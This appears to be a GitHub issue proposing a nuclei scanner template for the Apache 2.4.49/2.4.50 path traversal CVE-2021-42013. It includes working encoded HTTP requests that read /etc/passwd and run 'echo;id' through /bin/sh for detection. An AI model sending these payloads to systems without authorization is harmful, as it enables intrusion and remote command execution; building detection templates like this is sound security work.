### ISSUE TITLE
CVE-2021-42013.yaml

### ISSUE THREAD

**Issue by dinhbaouit** [projectdiscovery/nuclei-templates#2859]
**Template Details**
There is 2 case, if enable CGI and if disable CGI

```yaml

id: CVE-2021-42013

info:
  name: Apache 2.4.49/2.4.50 - Path Traversal lead to Local File Read and Remote Code Execution
  author: 0xd0ff9
  severity: critical
  description: Apache 2.4.49/2.4.50 - Path Traversal lead to Local File Read and Remote Code Execution
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42013

requests:
  - raw:
      - |+
        POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 7
        Connection: close

        0xd0ff9
    unsafe: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0"

      - type: status
        status:
          - 200

  - raw:
      - |+
        POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 7
        Connection: close

        echo;id
    unsafe: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "uid=.*gid=.*"

      - type: status
        status:
          - 200
```
